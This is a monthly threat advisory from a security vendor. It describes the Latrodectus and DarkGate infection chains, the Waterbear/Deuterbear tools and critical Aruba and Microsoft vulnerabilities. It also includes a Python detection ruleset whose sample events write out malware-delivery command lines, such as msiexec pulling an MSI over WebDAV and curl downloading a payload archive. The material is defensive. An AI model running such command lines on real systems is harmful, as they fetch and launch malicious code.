Monthly Advisory • 10 MIN READ

May 2024 Threat Advisory – Top 5

by Eleanor Barlow • May 2024

SecurityHQ’s Monthly Threat Report, Drawn from Recent Advisories of May 2024.

New TTPs Discovered for Latrodectus Malware Exploit Themes Associated with Microsoft and Cloudflare

Threat Reference: Global

Risks: Data Theft, Malware, and Backdoor

Advisory Type: Threats

Priority: Standard

SecurityHQ has uncovered a new backdoor named Latrodectus being distributed in phishing campaigns. These campaigns use Microsoft Azure and Cloudflare lures to make the emails appear legitimate, which makes it harder for email security platforms to detect them as malicious.

Latrodectus (aka Unidentified 111 and IceNova) is a Windows malware downloader first discovered in November 2023, used by threat actors tracked as TA577 and TA578, with its primary function being the download of additional EXE and DLL payloads or executing commands. Researchers have correlated this malware with the creators of the extensively deployed IcedID modular malware loader.

Earlier Attack Sequence

  1. The attack begins with the adversary filling out online contact forms to send fake copyright infringement notices to targeted organizations.
  2. The link in the fake notices leads victims to a Google Firebase URL that hosts a JavaScript file. When executed, this file uses the Windows installer (msiexec) to run an MSI file from a WebDAV share; the MSI contains the Latrodectus DLL payload.
  3. Before executing on the victim’s device, the malware performs various sandbox evasion checks to avoid detection. These checks are designed to identify if the malware is running in a sandbox environment commonly used for security analysis.
  4. After passing the evasion checks, the malware initializes by sending a victim registration report to its operators, including information about the infected system and environment.
  5. Latrodectus, acting as a downloader, communicates with a command and control (C2) server to receive further instructions.

Recent Attack Sequence

  1. The attack starts with reply-chain phishing emails containing malicious PDF attachments or embedded URLs, which lead to the installation of the Latrodectus malware.
  2. Attachments use generic names like ’04-25-Inv-Doc-339.pdf’ and pretend to be a document hosted in Microsoft Azure cloud, which must first be downloaded to be viewed.
  3. Clicking the ‘Download Document’ button redirects the user to a fake ‘Cloudflare security check’ that asks them to solve an easy math question. This step is likely intended to evade email security scanners and deliver the payload only to real users.
  4. When the correct answer is entered, the fake Cloudflare captcha will automatically download a JavaScript file pretending to be a document named “Document_i79_13b364058-83054409r0449-8089z4.js”.
  5. The downloaded JavaScript is heavily obfuscated: its comments hide a function that extracts the real script text and executes it, downloading an MSI from a hardcoded URL.
  6. When the MSI file is installed, it drops a DLL in the %AppData%\Custom_update folder and is launched by rundll32.exe. The file names are likely random per installation.
  7. The dropped DLL is the Latrodectus malware, which runs quietly in the background, waiting for payloads to install or commands to execute.

In the recent attack flow, Latrodectus has been observed dropping additional payloads such as the Lumma information stealer and Danabot.

Recommendation

  1. Monitor the network for the presence of the mentioned Indicators of Compromise (IOCs).
  2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
  3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
  4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
  5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
  6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
  7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

Darkgate Malware Uses Weaponized Attachments to Exploit Windows Operating Systems

Threat Reference: Global

Risks: Data Theft, Privilege Escalation, Malware Injection

Advisory Type: Threats

Priority: Standard

Forcepoint researchers recently uncovered a form of Darkgate malware distributed via phishing emails with malicious attachments such as XLSX, HTML, or PDF files; the malware takes over accounts and replicates itself. It is designed to be stealthy and persistent, making it challenging to detect and remove.

Since 2018, DarkGate has been a commodity loader with capabilities such as downloading and executing files in memory, a Hidden Virtual Network Computing (HVNC) module, keystroke logging, information stealing, and privilege escalation. It utilizes genuine AutoIt files and often employs multiple AutoIt scripts.

Attack Flow

  1. The campaign begins with a phishing email containing a PDF attachment that appears to be an invoice from “Intuit QuickBooks”. The PDF includes an XObject large image with an embedded hyperlink.
  2. Clicking the hyperlink triggers the download of a malicious .jar (Java Archive) file containing a .PNG file and a .class file.
  3. The .class file has a Java function that aims to download a .ZIP file to ‘C:\Downloads’. The download is performed using an obfuscated ‘curl.exe’ command.
  4. Upon successful download of the ZIP file, a PowerShell script is triggered to extract the contents using the ‘expand-archive’ command. The extracted ZIP file contains ‘autoit3.exe’ and a compiled AutoIt script with the ‘.a3x’ extension.
  5. The JAR file executes an obfuscated ‘cmd /c’ command to run the compiled AutoIt script. The AutoIt script uses obfuscated functions such as BITXOR and BinaryToString() for malicious activities.
  6. The script uses DLLSTRUCTCREATE() and DLLSTRUCTSETDATA() to manipulate system resources and potentially interact with sensitive data.
  7. It executes shellcode in memory and establishes a connection with a remote Command & Control (C&C) botnet server.

SecurityHQ discovered that the associated URLs follow a historical pattern, featuring domains and single paths reminiscent of those previously used by QakBot threat actors.
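As an added defender-side example (not part of the SecurityHQ advisory), the following Python rules encode the process chains from both Latrodectus sequences above (msiexec pulling an MSI from WebDAV, the fake Document_*.js, rundll32 loading a DLL from %AppData%\Custom_update) and from the DarkGate flow (Java spawning curl.exe into C:\Downloads, Expand-Archive, autoit3.exe with an .a3x script). The event field names follow Sysmon Event ID 1; the sample events, addresses and file names are constructed.

```python
"""Detection rules for the Latrodectus and DarkGate process chains described above,
run over Sysmon Event ID 1 style records (field names Image, CommandLine, ParentImage)."""
import re

# (rule name, parent-image pattern or None, image pattern, command-line pattern); matched lower-cased
RULES = [
    # Latrodectus: MSI drops a DLL under %AppData%\Custom_update and launches it via rundll32
    ("latrodectus-rundll32-custom_update", None, r"\\rundll32\.exe$", r"\\custom_update\\[^ ]+\.dll"),
    # Latrodectus earlier chain: msiexec pulling an MSI from a WebDAV share or URL
    ("latrodectus-msiexec-webdav", None, r"\\msiexec\.exe$", r"(\\\\[^ ]+\\davwwwroot\\|https?://)[^ ]+\.msi"),
    # Latrodectus: script host running the fake "Document_*.js" served by the fake captcha page
    ("latrodectus-wscript-document-js", None, r"\\[wc]script\.exe$", r"\\document_[^ \\]+\.js"),
    # DarkGate: Java class spawning curl.exe to fetch a ZIP into C:\Downloads
    ("darkgate-java-curl-download", r"\\javaw?\.exe$", r"\\curl\.exe$", r"c:\\downloads\\[^ ]+\.zip"),
    # DarkGate: Java spawning PowerShell Expand-Archive, then AutoIt3 running a compiled .a3x
    ("darkgate-java-expand-archive", r"\\javaw?\.exe$", r"\\powershell\.exe$", r"expand-archive"),
    ("darkgate-autoit3-a3x", None, r"\\autoit3\.exe$", r"\.a3x\b"),
]

def match_rules(event):
    """Return the names of every rule that matches one process-creation event."""
    parent, image, cmd = (event.get(k, "").lower() for k in ("ParentImage", "Image", "CommandLine"))
    hits = []
    for name, parent_re, image_re, cmd_re in RULES:
        if parent_re and not re.search(parent_re, parent):
            continue
        if re.search(image_re, image) and re.search(cmd_re, cmd):
            hits.append(name)
    return hits

def scan(events):
    """Map each rule that fired to the indices of the events that triggered it."""
    fired = {}
    for i, event in enumerate(events):
        for name in match_rules(event):
            fired.setdefault(name, []).append(i)
    return fired

# Constructed sample events (203.0.113.x is documentation address space; file names are placeholders).
SAMPLE_EVENTS = [dict(zip(("ParentImage", "Image", "CommandLine"), t)) for t in [
    (r"C:\Windows\System32\msiexec.exe", r"C:\Windows\System32\rundll32.exe",
     r'rundll32.exe "C:\Users\alice\AppData\Roaming\Custom_update\Update_7c1.dll",run'),
    (r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\msiexec.exe",
     r"msiexec.exe /i \\203.0.113.10@80\DavWWWRoot\installer.msi /qn"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\wscript.exe",
     r'wscript.exe "C:\Users\alice\Downloads\Document_i79_13b364058-83054409r0449-8089z4.js"'),
    (r"C:\Program Files\Java\bin\javaw.exe", r"C:\Windows\System32\curl.exe",
     r"curl.exe -o C:\Downloads\pkg.zip http://203.0.113.20/pkg.zip"),
    (r"C:\Program Files\Java\bin\javaw.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     r"powershell -c Expand-Archive C:\Downloads\pkg.zip C:\Downloads\pkg"),
    (r"C:\Windows\System32\cmd.exe", r"C:\Downloads\pkg\autoit3.exe", r"autoit3.exe C:\Downloads\pkg\run.a3x"),
    # Benign control: ordinary rundll32 use must not fire any rule
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL"),
]]
```

Run `scan(SAMPLE_EVENTS)` to see each rule fire exactly once on the six malicious events and nothing on the benign control.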

Indicators of compromise (IOCs), Domains/URLs:


Recommendations

  1. Monitor the network for the presence of the mentioned Indicators of Compromise (IOCs).
  2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
  3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
  4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
  5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
  6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
  7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

The Earth Hundun APT Group Utilizes Waterbear and Deuterbear Across the Asia-Pacific Region

Threat Reference: Global

Risks: Data Theft, Unauthorized Access, Privacy Invasion, Malware Injection

Advisory Type: Threats

Priority: Standard

SecurityHQ discovered that Earth Hundun, a threat actor known for targeting the Asia-Pacific region, is using the Waterbear malware and its latest iteration, Deuterbear. SecurityHQ first observed Deuterbear being used by Earth Hundun in October 2022, and it has since been part of the group’s subsequent campaigns.

Waterbear

Waterbear operates within the victim’s environment and spreads additional downloaders across the internal network. In the initial stage, it uses a patched legitimate executable, a loader, and an encrypted download. The Waterbear RAT downloads a plugin and injects it into a process. It adapts its communication by hiding activities or connecting to different C&C servers. Before executing commands, it sends detailed victim information to the C&C server. Waterbear identifies processes for injection and gathers related details.

Deuterbear

In the first stage, the loader decrypts the downloader, allowing retrieval of the initial stage RAT. The first stage RAT surveys the victim’s system and finds a persistence folder. The second-stage components, including the loader with decryption, are installed in this folder. On most systems, only the second stage remains after the first stage components are removed.

Deuterbear inherits various components from the downloader, including anti-analysis techniques and encryption keys. It updates communication protocols without a handshake with the C&C server.

Before executing commands, it transmits victim information to the C&C server. Deuterbear replicates functionalities from Waterbear, but with fewer RAT commands and more plugin flexibility.

After plugin installation, traffic determines which plugin is launched, with three protocol options provided.

Comparison

  1. Deuterbear offers fewer commands but supports more plugins for enhanced flexibility.
  2. It simplifies communication by using the same HTTPS channel and RC4 traffic key as the downloader, avoiding the need for a handshake with the C&C server to update protocols.
  3. Deuterbear is the successor to Waterbear, introducing new features.
  4. Notably, Waterbear and Deuterbear evolve independently rather than replacing each other.

Indicators of compromise (IOCs), Domains/URLs:


Recommendation

  1. Monitor the network for the presence of the mentioned Indicators of Compromise (IOCs).
  2. Implement email security solutions to detect and block phishing emails containing malicious attachments or URLs.
  3. Utilize advanced threat detection mechanisms to analyze email attachments and employ URL filtering technologies to block access to known malicious domains.
  4. Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
  5. Enforce the principle of least privilege to limit users’ access to sensitive systems and data and implement multi-factor authentication (MFA).
  6. Implement network segmentation, firewalls, and intrusion detection/prevention systems (IDS/IPS) to monitor and control network traffic.
  7. Raise awareness among your staff about the potential risks associated with opening suspicious emails or documents in general.

HPE Aruba Networking Addresses Multiple Critical and High Severity Vulnerabilities Discovered Across Aruba Access Points

Threat Reference: Global

Risks: Remote Code Execution, Arbitrary Code as a Privileged User

Advisory Type: Updates/Patches

Priority: Standard

SecurityHQ has observed that HPE Aruba Networking has released patches for Aruba Access Points running InstantOS and ArubaOS 10 that address multiple security vulnerabilities. Successful exploitation of these vulnerabilities results in the ability to execute arbitrary code as a privileged user on the underlying operating system.

Affected software versions include ArubaOS 10.5.x.x: 10.5.1.0 and below, ArubaOS 10.4.x.x: 10.4.1.0 and below, InstantOS 8.11.x.x: 8.11.2.1 and below, InstantOS 8.10.x.x: 8.10.0.10 and below, and InstantOS 8.6.x.x: 8.6.0.23 and below.

Notable CVEs:

  • [CVSSv3 Score: 9.8] [CVE-2024-31466, CVE-2024-31467]: Unauthenticated Buffer Overflow Vulnerabilities in CLI Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 9.8] [CVE-2024-31468, CVE-2024-31469]: Unauthenticated Buffer Overflow Vulnerabilities in Central Communications Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 9.8] [CVE-2024-31470]: Unauthenticated Buffer Overflow Vulnerability in the Simultaneous Authentication of Equals (SAE) Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 9.8] [CVE-2024-31471]: Unauthenticated Command Injection Vulnerability in Central Communications Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 9.8] [CVE-2024-31472]: Unauthenticated Command Injection Vulnerabilities in the Soft AP Daemon Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 9.8] [CVE-2024-31473]: Unauthenticated Command Injection Vulnerability in the Deauthentication Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 8.2] [CVE-2024-31474]: Unauthenticated Arbitrary File Deletion in CLI Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 8.2] [CVE-2024-31475]: Unauthenticated Arbitrary File Deletion in Central Communications Service Accessed by the PAPI Protocol.
  • [CVSSv3 Score: 7.2] [CVE-2024-31476, CVE-2024-31477]: Authenticated Remote Command Execution in Aruba InstantOS or ArubaOS 10 Command Line Interface.

End of Life Versions:

ArubaOS 10.3.x.x: all, InstantOS 8.9.x.x: all, InstantOS 8.8.x.x: all, InstantOS 8.7.x.x: all, InstantOS 8.5.x.x: all, InstantOS 8.4.x.x: all, InstantOS 6.5.x.x: all, InstantOS 6.4.x.x: all, ArubaOS 10.5.x.x, and InstantOS 8.11.x.x.

Note: SecurityHQ has not observed exploitation of these vulnerabilities by threat actors or malware variants.

Recommendations

  1. To minimize the likelihood of an attacker exploiting these vulnerabilities, HPE Aruba Networking recommends that the CLI and web-based management interfaces be restricted to a dedicated layer 2 segment/VLAN and/or controlled by firewall policies at layer 3 and above.
  2. Enabling cluster security via the cluster-security command prevents these vulnerabilities from being exploited on InstantOS devices running 8.x or 6.x code. For ArubaOS 10 devices this is not an option; instead, access to port UDP/8211 must be blocked from all untrusted networks. Please contact HPE Services – Aruba Networking TAC for configuration assistance.

Permanent Fix

It is recommended to upgrade the software to the following versions: ArubaOS 10.6.x.x: 10.6.0.0 and above, ArubaOS 10.5.x.x: 10.5.1.1 and above, ArubaOS 10.4.x.x: 10.4.1.1 and above, InstantOS 8.12.x.x: 8.12.0.0 and above, InstantOS 8.11.x.x: 8.11.2.2 and above, InstantOS 8.10.x.x: 8.10.0.11 and above, and InstantOS 8.6.x: 8.6.0.24 and above.
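As an added example (not from HPE Aruba Networking or SecurityHQ), this Python check maps a reported InstantOS or ArubaOS version onto the affected, fixed and end-of-life branches listed above and folds in the two interim workarounds. The product labels, the status strings and the treatment of branches the advisory does not name are this example's own assumptions; the version boundaries are the ones stated in the advisory.

```python
"""Classify an Aruba AP firmware version against the affected, fixed and end-of-life
branches listed in the advisory, and combine it with the interim workarounds."""

# Minimum fixed release per branch, from the "Permanent Fix" section.
FIXED = {
    "ArubaOS": {(10, 6): (10, 6, 0, 0), (10, 5): (10, 5, 1, 1), (10, 4): (10, 4, 1, 1)},
    "InstantOS": {(8, 12): (8, 12, 0, 0), (8, 11): (8, 11, 2, 2),
                  (8, 10): (8, 10, 0, 11), (8, 6): (8, 6, 0, 24)},
}
# Branches the advisory lists as end of life with "all" versions affected and no fixed build.
EOL = {
    "ArubaOS": {(10, 3)},
    "InstantOS": {(8, 9), (8, 8), (8, 7), (8, 5), (8, 4), (6, 5), (6, 4)},
}

def parse_version(text):
    """Turn '10.5.1.0' (or a shorter prefix such as '8.6') into a 4-tuple of ints."""
    parts = text.strip().split(".")
    if not 2 <= len(parts) <= 4 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised Aruba version string: {text!r}")
    nums = tuple(int(p) for p in parts)
    return nums + (0,) * (4 - len(nums))   # pad so tuple comparison works

def assess(product, version):
    """Return 'fixed', 'vulnerable', 'end-of-life' or 'unknown-branch' for one AP."""
    if product not in FIXED:
        raise ValueError(f"product must be ArubaOS or InstantOS, got {product!r}")
    v = parse_version(version)
    branch = v[:2]
    if branch in EOL[product]:
        return "end-of-life"           # no fixed build exists; the only fix is a branch upgrade
    fixed = FIXED[product].get(branch)
    if fixed is None:
        return "unknown-branch"        # not named in the advisory (assumption: treat as unverified)
    return "fixed" if v >= fixed else "vulnerable"

def exposure(product, version, cluster_security=False, udp_8211_blocked=False):
    """Fold the interim workarounds into the patch state: cluster-security covers InstantOS
    8.x/6.x; ArubaOS 10 has to rely on blocking UDP/8211 (PAPI) from untrusted networks."""
    state = assess(product, version)
    if state == "fixed":
        return "patched"
    if product == "InstantOS" and cluster_security:
        return "mitigated-cluster-security"
    if udp_8211_blocked:
        return "mitigated-udp-8211-blocked"
    return "exposed-" + state          # vulnerable, end-of-life or unknown-branch with no workaround
```

A fleet-wide inventory can call `exposure()` per access point and treat anything that is not `patched` as an upgrade ticket, with the two `mitigated-*` states as temporary only.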

Microsoft Released May 2024 Patch Tuesday for 61 Flaws, Including 3 Zero-days

Threat Reference: Global

Risks: Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service

Advisory Type: Updates/Patches

Priority: Standard

Microsoft has released its May 2024 Patch Tuesday with security updates for 61 flaws, including three zero-day vulnerabilities. Successful exploitation of these vulnerabilities could result in Remote Code Execution, Elevation of Privilege, Security Feature Bypass, Information Disclosure, Spoofing and Denial of Service.

Affected products include Windows, Windows Hyper-V, .NET & Visual Studio Code, Microsoft Dynamics, Microsoft Office, Microsoft Exchange Server, Microsoft SharePoint Server, CBL-Mariner, Microsoft Edge, Microsoft PowerBI Client, Windows Mobile Broadband Driver, Azure, and Win32k.

Notable CVEs

  • [Zero Day] – CVE-2024-30040 – Windows MSHTML Platform Security Feature Bypass Vulnerability
  • [Zero Day] – CVE-2024-30051 – Windows DWM Core Library Elevation of Privilege Vulnerability
  • [Zero Day] – CVE-2024-30046 – Visual Studio Denial of Service Vulnerability
  • [Critical] – CVE-2024-30044 – Microsoft SharePoint Server Remote Code Execution Vulnerability

For a full list of important CVEs, see the Microsoft release notes: https://msrc.microsoft.com/update-guide/releaseNote/2024-May

Recommendation

It is recommended to update all affected products to the latest available patch version.

Threat Intelligence for the Future

SecurityHQ’s Threat Intelligence team is a cohesive global unit dedicated to Cyber Threat Intelligence. Our team is focused on researching emerging threats, tracking activities of threat-actors, ransomware groups, and campaigns, to ensure that they stay ahead of potential risks. Beyond their investigative work, the Intelligence team provides actionable threat intelligence and research, enriching the understanding of SecurityHQ’s customers worldwide. United by a common commitment, the SecurityHQ Threat Intelligence team delivers the insights needed to confidently navigate the intricacies of the cyber security threat landscape. For more information on these threats, speak to an expert here. Or if you suspect a security incident, you can report an incident here.